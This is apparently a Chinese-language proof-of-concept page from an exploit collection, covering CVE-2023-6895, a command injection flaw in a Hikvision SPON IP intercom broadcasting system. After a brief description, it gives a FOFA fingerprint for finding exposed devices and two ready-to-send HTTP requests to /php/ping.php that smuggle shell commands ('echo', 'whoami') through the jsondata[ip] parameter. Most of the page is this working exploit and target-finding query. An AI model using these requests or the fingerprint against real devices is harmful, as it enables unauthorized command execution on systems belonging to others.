POC/wpoc/海康威视/海康威视SPONIP网络对讲广播系统/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md

# 海康威视SPON IP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895)

# 一、漏洞简介
Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

# 二、影响版本
+ 海康威视SPON IP网络对讲广播系统

# 三、资产测绘
+ fofa`icon_hash="-1830859634"`
+ 特征

![1703683596082-c644fff9-438a-460f-891f-450ad725c4bd.png](./img/zkv4X8uRv86yGSaP/1703683596082-c644fff9-438a-460f-891f-450ad725c4bd-280274.png)

# 四、漏洞复现
```plain
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|echo stc&jsondata[type]=1
```

![1703683644604-a5807506-f785-435a-b533-2746677fe24b.png](./img/zkv4X8uRv86yGSaP/1703683644604-a5807506-f785-435a-b533-2746677fe24b-391178.png)

```plain
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|whoami&jsondata[type]=1
```

![1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a.png](./img/zkv4X8uRv86yGSaP/1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a-426020.png)



> 更新: 2024-02-29 23:57:17  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oi2zyivh6brw6t9s>